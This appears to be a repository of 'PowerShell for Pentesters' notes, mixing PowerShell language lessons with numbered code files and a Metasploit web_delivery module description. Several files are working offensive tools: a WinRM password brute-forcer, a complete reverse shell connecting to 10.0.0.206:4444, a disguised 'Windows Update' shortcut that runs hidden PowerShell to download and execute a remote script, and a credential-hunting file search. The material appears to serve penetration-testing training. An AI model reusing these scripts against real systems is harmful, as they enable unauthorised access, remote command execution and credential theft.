Delivery Module: exploit/multi/script/web_delivery Platform: Python, PHP, Windows Privileged: No License: Metasploit Framework License (BSD) Rank: Manual Disclosed: 2013-07-19 Provided by: Andrew Smith "jakx" Ben Campbell Chris Campbell Available targets: Id Name -- ---- 0 Python 1 PHP 2 PSH Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH no The URI to use for this exploit (default is random) Payload information: Description: This module quickly fires up a web server that serves a payload. The provided command will start the specified scripting language interpreter and then download and execute the payload. The main purpose of this module is to quickly establish a session on a target machine when the attacker has to manually type in the command himself, e.g. Command Injection, RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not write to disk so it is less likely to trigger AV solutions and will allow privilege escalations supplied by Meterpreter. When using either of the PSH targets, ensure the payload architecture matches the target computer or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines. References: http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html http://www.pentestgeek.com/2013/07/19/invoke-shellcode/ http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/ http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html msf exploit(web_delivery) > ``` ================================================ FILE: 6-Advanced-Operators.md ================================================ #### 6. Advanced Operators - Logical (```-and, -or, -xor, -not, !```) ```PowerShell PS C:\Users\Windows-32> (1 -le 6) -and (6 -ge 6) True PS C:\Users\Windows-32> (1 -le 6) -and (6 -ge 8) False PS C:\Users\Windows-32> ``` ```PowerShell PS C:\Users\Windows-32> (1 -le 6) -or (6 -ge 8) True PS C:\Users\Windows-32> ``` - Split and Join (```-split, -join```) ```PowerShell PS C:\Users\Windows-32> "Welcome to PowerShell" -split " " Welcome to PowerShell PS C:\Users\Windows-32> PS C:\Users\Windows-32> "Welcome to PowerShell" -split "t" Welcome o PowerShell PS C:\Users\Windows-32> PS C:\Users\Windows-32> "Welcome to PowerShell" -split "t",3 Welcome o PowerShell PS C:\Users\Windows-32> ``` ```PowerShell PS C:\Users\Windows-32> "Wel"," Please" -join "come" Welcome Please PS C:\Users\Windows-32> ``` - Type Operators (```-is, -isnot, -as```) ```PowerShell PS C:\Users\Windows-32> 3 -is "int" True PS C:\Users\Windows-32> "3" -is "string" True PS C:\Users\Windows-32> ``` ```PowerShell PS C:\Users\Windows-32> 0x12 -as "int" 18 PS C:\Users\Windows-32> 0x12 -as "string" 18 PS C:\Users\Windows-32> ``` ================================================ FILE: 7-Types-in-Powershell.md ================================================ #### 7. Types in Powershell - ```Dynamic Types``` - Not strictly typed ```PowerShell PS C:\Users\Windows-32> $value = "string" + 1 PS C:\Users\Windows-32> $value.GetType() IsPublic IsSerial Name BaseType -------- -------- ---- -------- True True String System.Object PS C:\Users\Windows-32> ``` - Basis of ```PowerShell``` types is ```.Net``` - [```Type Adaption```](https://blogs.msdn.microsoft.com/besidethepoint/2011/11/22/psobject-and-the-adapted-and-extended-type-systems-ats-and-ets/) – Provides access to alternate object systems like WMI, COM, ADSI etc. - ```Single quoted``` vs ```Double qouted``` ```PowerShell PS C:\Users\Windows-32> $str = "This is a string" PS C:\Users\Windows-32> $str.GetType() IsPublic IsSerial Name BaseType -------- -------- ---- -------- True True String System.Object PS C:\Users\Windows-32> ``` ```PowerShell PS C:\Users\Windows-32> $str = 'This is a string' PS C:\Users\Windows-32> $str.GetType() IsPublic IsSerial Name BaseType -------- -------- ---- -------- True True String System.Object PS C:\Users\Windows-32> ``` ```PowerShell PS C:\Users\Windows-32> "Another String $str" Another String This is a string PS C:\Users\Windows-32> PS C:\Users\Windows-32> 'Another String $str' Another String $str PS C:\Users\Windows-32> ``` - ```Here Strings``` - Multiline ```PowerShell PS C:\Users\Windows-32> @" >> hi >> this >> is >> a >> line >> "@ >> hi this is a line PS C:\Users\Windows-32> ``` ================================================ FILE: 8-Arrays-in-Powershell.md ================================================ #### 8. Arrays in Powershell - Type conversion in PowerShell is done with the help of cast ```[ ]``` operator ```PowerShell PS C:\Users\Windows-32> $a = 6.7 + 4 PS C:\Users\Windows-32> $a 10.7 PS C:\Users\Windows-32> $a.GetType() IsPublic IsSerial Name BaseType -------- -------- ---- -------- True True Double System.ValueType PS C:\Users\Windows-32> ``` ```PowerShell PS C:\Users\Windows-32> [int]$a = 3.2 + 6 PS C:\Users\Windows-32> $a 9 PS C:\Users\Windows-32> $a.GetType() IsPublic IsSerial Name BaseType -------- -------- ---- -------- True True Int32 System.ValueType PS C:\Users\Windows-32> ``` ```PowerShell PS C:\Users\Windows-32> $b = 5.7 + 5.7 PS C:\Users\Windows-32> $b 11.4 PS C:\Users\Windows-32> $b.GetType() IsPublic IsSerial Name BaseType -------- -------- ---- -------- True True Double System.ValueType PS C:\Users\Windows-32> [int]$b 11 PS C:\Users\Windows-32> $b.GetType() IsPublic IsSerial Name BaseType -------- -------- ---- -------- True True Double System.ValueType PS C:\Users\Windows-32> ``` ```PowerShell PS C:\Users\Windows-32> $result = Get-ChildItem PS C:\Users\Windows-32> $result.GetType() IsPublic IsSerial Name BaseType -------- -------- ---- -------- True True Object[] System.Array PS C:\Users\Windows-32> ``` - Arrays - Commands in PowerShell return an array of Objects – ```[Object[]]``` - More than one type of elements could be stored ```PowerShell PS C:\Users\Windows-32> $array = 1,2,3,4,5 PS C:\Users\Windows-32> $array 1 2 3 4 5 PS C:\Users\Windows-32> $array.Length 5 PS C:\Users\Windows-32> $array[0] 1 PS C:\Users\Windows-32> $array[1] 2 PS C:\Users\Windows-32> $array[2] 3 PS C:\Users\Windows-32> ``` ```PowerShell PS C:\Users\Windows-32> $array_notype = 1,"Hi",4.7 PS C:\Users\Windows-32> $array_notype 1 Hi 4.7 PS C:\Users\Windows-32> ``` ```PowerShell PS C:\Users\Windows-32> $emptyarray = @() PS C:\Users\Windows-32> $emptyarray PS C:\Users\Windows-32> $emptyarray.GetType() IsPublic IsSerial Name BaseType -------- -------- ---- -------- True True Object[] System.Array PS C:\Users\Windows-32> ``` ###### Exercise - Strongly typed arrays ```PowerShell PS C:\Users\Windows-32> [int[]] $arr = 1,2,4,3 PS C:\Users\Windows-32> $arr 1 2 4 3 PS C:\Users\Windows-32> ``` ```PowerShell PS C:\Users\Windows-32> [int[]] $arr1 = 7.5,4.6,5 PS C:\Users\Windows-32> $arr1 8 5 5 PS C:\Users\Windows-32> ``` ================================================ FILE: 9-Conditional-Statements-in-Powershell.md ================================================ #### 9. Conditional Statements in Powershell ###### If Conditional Statement - If, elseif, else - Supports usage of commands, cmdlets and pipeline in the condition part ```PowerShell PS C:\Users\Windows-32> if (1 -gt 0) {"One"} else {"Something"} One PS C:\Users\Windows-32> if (1 -gt 4) {"One"} else {"Something"} Something PS C:\Users\Windows-32> ``` ```PowerShell PS C:\Users\Windows-32> if ( ((Get-Process).Count) -gt 40 ) {"Too many processes"} else {"OK"} OK PS C:\Users\Windows-32> ``` ###### Switch Statement - Supports parameters like (```–Exact, –Wildcard, -Regex```) for condition matching ```PowerShell PS C:\Users\Windows-32> switch (1) { 1 {"One"} 2 {"Two"} } One PS C:\Users\Windows-32> switch (11) { 1 {"One"} 2 {"Two"} default {"Default"} } Default ``` ```PowerShell PS C:\Users\Windows-32> switch -wildcard ('abc') { a* {"A"} *b* {"B"} c* {"C"} } A B PS C:\Users\Windows-32> ``` ```PowerShell PS C:\Users\Administrator> switch -Exact (111) { 1* {"Just one"} 2* {"Just two"} *1* {"All one"} 111 {"Exact all one"} } Exact all one PS C:\Users\Administrator> ``` - Ability to process files using the ```-file``` parameter ```PowerShell PS C:\Users\Windows-32> switch -Regex -File C:\test\WindowsUpdate.log { 'Validating'{$_} } ``` ================================================ FILE: Code/11/HelloWorld.ps1 ================================================ "Hello World" ================================================ FILE: Code/15/paramatrributes.ps1 ================================================ function paramattributes { param ( [Parameter (Mandatory = $True, Position=0, ValueFromPipeline = $True, ParameterSetName="ParamSet1")] [ValidateSet(1,2,3)] # [AllowNull()] $a, [Parameter (Mandatory = $True, Position=1)] [AllowNull()] $b ) Write-Output "a is $a" Write-Output "b is $b" } ================================================ FILE: Code/16/Show-AdvancedScript.ps1 ================================================ function Show-AdvancedScript { [CmdletBinding( SupportsShouldProcess = $True)] param( [Parameter()] $FilePath ) Write-Verbose "Deleting $FilePath" if ($PSCmdlet.ShouldProcess("$FilePath", "Deleting file permanently")) { Remove-Item $FilePath } } ================================================ FILE: Code/18/Check-PassTheHash.psm1 ================================================ function Check-PassTheHash { $hotfixes = "KB2871997" #checks the computer it's run on if any of the listed hotfixes are present $hotfix = Get-HotFix -ComputerName $env:computername | Where-Object {$hotfixes -contains $_.HotfixID} | Select-Object -property "HotFixID" $Global:out = Get-HotFix | Where-Object {$hotfixes -contains $_.HotfixID} } function Result-PassTheHash { if ($out) { "Found HotFix: " + $out.HotFixID } else { "Didn't Find HotFix" } } ================================================ FILE: Code/18/Show-AdvancedScript.psm1 ================================================ function Show-AdvancedScript { [CmdletBinding( SupportsShouldProcess = $True)] param( [Parameter()] $Global:FilePath ) Write-Verbose "Deleting $FilePath" if ($PSCmdlet.ShouldProcess("$FilePath", "Deleting file permanently")) { Remove-Item $FilePath } } function Test-FileExistence { Test-Path $FilePath } function DoNoNeedToShow { Write-Output "No Need to show this to user" } Export-ModuleMember -Function *-* ================================================ FILE: Code/23/Search-Sensitive.ps1 ================================================ $file = Get-ChildItem -Path C:\ -Filter *.txt -Recurse Write-Output "`nFiles Found " --------------------- $file.Count Write-Output "`nScript Output " --------------------- Select-String $file -Pattern username, password, credential ================================================ FILE: Code/29/Invoke-SysCommands.ps1 ================================================ $DotnetCode = @" public class SysCommands { public static void lookup(string domainname) { System.Diagnostics.Process.Start("nslookup.exe",domainname); } public void netcmd (string cmd) { string cmdstring = "/k net.exe " + cmd; System.Diagnostics.Process.Start("cmd.exe",cmdstring); } } "@ Add-Type -TypeDefinition $DotnetCode #[SysCommands]::lookup("google.com") $obj = New-Object SysCommands $obj.netcmd("user") ================================================ FILE: Code/30/Invoke-SysCommandsDLL.ps1 ================================================ $DotnetCode = @" public class SysCommands { public static void lookup (string domainname) { System.Diagnostics.Process.Start("nslookup.exe",domainname); } public void netcmd (string cmd) { string cmdstring = "/k net.exe " + cmd; System.Diagnostics.Process.Start("cmd.exe",cmdstring); } public static void Main() { string cmdstring = "/k net.exe " + "user"; System.Diagnostics.Process.Start("cmd.exe",cmdstring); } } "@ #Add-Type -TypeDefinition $DotnetCode -OutputType Library -OutputAssembly C:\Users\Administrator\Desktop\SysCommands.dll Add-Type -TypeDefinition $DotnetCode -OutputType ConsoleApplication -OutputAssembly C:\Users\Administrator\Desktop\SysCommand.exe <##[SysCommands]::lookup("google.com") $obj = New-Object SysCommands $obj.netcmd("user")#> ================================================ FILE: Code/31/New-SymLink.ps1 ================================================ $ApiCode = @" [DllImport("kernel32.dll")] public static extern bool CreateSymbolicLink(string lpSymlinkFileName, string lpTargetFileName, int dwFlags); "@ $SymLink = Add-Type -MemberDefinition $ApiCode -Name Symlink -Namespace CreatSymLink -PassThru $SymLink::CreateSymbolicLink('C:\link', 'C:\Users\', 1) ================================================ FILE: Code/35/Ie-Com.ps1 ================================================ $url = "http://www.google.com" $ie_o = New-Object -ComObject InternetExplorer.Application.1 $ie_o.visible = $False; $ie_o.navigate($url); ================================================ FILE: Code/41/Get-DefaultPage.ps1 ================================================ $reader = [System.IO.File]::OpenText("C:\Users\Administrator\Desktop\Code\41\ip.txt") while($null -ne ($line = $reader.ReadLine())) { $filename = [System.IO.Path]::GetFileName($line) Invoke-WebRequest $line -OutFile $filename } ================================================ FILE: Code/41/ip.txt ================================================ 10.0.0.1 31.13.77.36 204.79.197.203 216.58.194.164 192.185.165.194 ================================================ FILE: Code/42/Start-AutoNmap.ps1 ================================================ $outputpath = "C:\Users\Administrator\Desktop" $IPRanges = "10.0.0.1/24" foreach ($range in $IPRanges) { $temp = $range -split "/" $file = $temp[0] & "nmap.exe" "-nvv" "-Pn" "--top-ports" "20" "$range" "-oX" "$Outputpath\$file.xml" } ================================================ FILE: Code/44/Get-WinRMPassword.ps1 ================================================ Function Get-WinRMPassword { <# .SYNOPSIS Simple bruteforce attack upon a Windows machine running WinRM .DESCRIPTION This CMDLet will perform a simplistic bruteforce attack upon a Windows Server or Client running WinRM in either a domain joined or workgroup configuration. The CMDLet will try each UserName + Password Combination until a sucessfuly entry is found or the list is exhausted. If nothing is output, then .PARAMETER UserName The username you wish to gain entry with .PARAMETER ComputerName Target machine .PARAMETER wordlist String path to file containing list of words/passwords .PARAMETER Authentication WinRM auth mechanism, defaults to Negotiate (should work on most systems). See the specifics of the Authentication parameter in test-wsman. .PARAMETER UseSSL Specifies that the Secure Sockets Layer (SSL) protocol should be used to establish a connection to the remote computer. By default, SSL is not used. .EXAMPLE get-winrmpassword -UserName Administrator -ComputerName myvictim -WordList c:\mywordlist.txt Will read mywordlist.txt and for each entry in that list, try Administrator: .NOTES If you are not in a domain joined (running workgroup), then you should do the following: 1. Add the "target" to the WinRM trusted hosts - winrm set winrm/config/client @{TrustedHosts="victim"} 2. You may need to enable "unencrypted" (http connections) - winrm set winrm/config/client @{AllowUnencrypted="true"} 3. You may need to enable basic auth - winrm set winrm/config/client/auth @{Basic="true"} .INPUTS None This cmdlet does not accept any input. .OUTPUTS None This cmdlet does not generate any output object .LINK http://aperturescience.su/ #> [CMDLetBinding()] param ( [Parameter(mandatory=$true)] [String] $username, [Parameter(mandatory=$true)] [String] $ComputerName, [Parameter(mandatory=$true)] [String] $wordlist, [String] $Authentication = "Negotiate", [switch] $UseSSL ) #read word list (consider pipeline for performance) $wordlistentries = Get-Content $wordlist foreach ($entry in $wordlistentries) { Write-Verbose "Trying $entry" #make a secure string, and then a pscredentials object with username and password $securepassword = ConvertTo-SecureString $entry -AsPlainText -Force $pscredentials = New-Object System.Management.Automation.PSCredential ($username, $securepassword) #clear error listing $Error.clear() #run the test, taking into account the SSL status if ($UseSSL) { Test-WSMan -ComputerName $ComputerName -Credential $pscredentials -Authentication $Authentication -erroraction SilentlyContinue -UseSSL | Out-Null } else { Test-WSMan -ComputerName $ComputerName -Credential $pscredentials -Authentication $Authentication -erroraction SilentlyContinue | Out-Null } #put the first error into a variable (best practice) $ourerror = $error[0] # if there is no error, then we were successfull, else, was it a username or password error? if it wasn't username/password incorrect, something else is wrong so break the look if ($ourerror -eq $null) { "Password Found: $entry" break } elseif (-not $ourerror.ErrorDetails.Message.Contains("The user name or password is incorrect.")) { "Check the settings, confirm host is in TrustedHosts, confirm hostname, check for SSL etc, $($ourerror.ErrorDetails.Message)" break } else { Write-Debug "$($ourerror.ErrorDetails.Message)" } } } ================================================ FILE: Code/47/mini-reverse.ps1 ================================================ $socket = new-object System.Net.Sockets.TcpClient('10.0.0.206', 4444); if($socket -eq $null){exit 1} $stream = $socket.GetStream(); $writer = new-object System.IO.StreamWriter($stream); $buffer = new-object System.Byte[] 1024; $encoding = new-object System.Text.AsciiEncoding; do { $writer.Flush(); $read = $null; $res = "" while($stream.DataAvailable -or $read -eq $null) { $read = $stream.Read($buffer, 0, 1024) } $out = $encoding.GetString($buffer, 0, $read).Replace("`r`n","").Replace("`n",""); if(!$out.equals("exit")){ $args = ""; if($out.IndexOf(' ') -gt -1){ $args = $out.substring($out.IndexOf(' ')+1); $out = $out.substring(0,$out.IndexOf(' ')); if($args.split(' ').length -gt 1){ $pinfo = New-Object System.Diagnostics.ProcessStartInfo $pinfo.FileName = "cmd.exe" $pinfo.RedirectStandardError = $true $pinfo.RedirectStandardOutput = $true $pinfo.UseShellExecute = $false $pinfo.Arguments = "/c $out $args" $p = New-Object System.Diagnostics.Process $p.StartInfo = $pinfo $p.Start() | Out-Null $p.WaitForExit() $stdout = $p.StandardOutput.ReadToEnd() $stderr = $p.StandardError.ReadToEnd() if ($p.ExitCode -ne 0) { $res = $stderr } else { $res = $stdout } } else{ $res = (&"$out" "$args") | out-string; } } else{ $res = (&"$out") | out-string; } if($res -ne $null){ $writer.WriteLine($res) } } }While (!$out.equals("exit")) $writer.close(); $socket.close(); $stream.Dispose() ================================================ FILE: Code/49/Out-ShortcutModified.ps1 ================================================ function Out-Shortcut { [CmdletBinding()] Param( [Parameter(Position = 0, Mandatory = $False)] [String] $Executable = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", [Parameter(Position = 1, Mandatory = $False)] [String] $Payload, [Parameter(Position = 2, Mandatory = $False)] [String] $PayloadURL, [Parameter(Position = 3, Mandatory = $False)] [String] $Arguments, [Parameter(Position = 4, Mandatory = $False)] [String] $OutputPath = "$pwd\Shortcut to File Server.lnk", [Parameter(Position = 5, Mandatory = $False)] [String] $HotKey = 'F5', [Parameter(Position = 6, Mandatory = $False)] [String] $Icon='explorer.exe' ) if(!$Payload) { $Payload = " -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile -c IEX ((New-Object Net.WebClient).DownloadString('$PayloadURL'));$Arguments" } $WshShell = New-Object -comObject WScript.Shell $Shortcut = $WshShell.CreateShortcut($OutputPath) $Shortcut.TargetPath = $Executable $Shortcut.Description = "Shortcut to Windows Update Commandline" $Shortcut.WindowStyle = 7 $Shortcut.Hotkey = $HotKey $Shortcut.IconLocation = "$Icon,0" $Shortcut.Arguments = $Payload $Shortcut.Save() Write-Output "The Shortcut file has been written as $OutputPath" } Out-Shortcut -PayloadURL http://10.0.0.233/mini-reverse.ps1 ================================================ FILE: Code/51/Convert-Dll.ps1 ================================================ function Convert-Dll { <# .SYNOPSIS Nishang script to convert an executable to text file. .DESCRIPTION This script converts and an executable to a text file. .PARAMETER EXE The path of the executable to be converted. .PARAMETER FileName Path of the text file to which executable will be converted. .EXAMPLE PS > ExetoText C:\binaries\evil.exe C:\test\evil.txt .LINK http://www.exploit-monday.com/2011/09/dropping-executables-with-powershell.html https://github.com/samratashok/nishang #> [CmdletBinding()] Param( [Parameter(Position = 0, Mandatory = $True)] [String] $DllPath, [Parameter(Position = 1, Mandatory = $True)] [String] $OutputPath ) [byte[]] $hexdump = get-content -encoding byte -path "$DllPath" $hexdump -join ',' > $OutputPath } ================================================ FILE: README.md ================================================ # PowerShell-for-Pentesters PowerShell for Pentesters Notes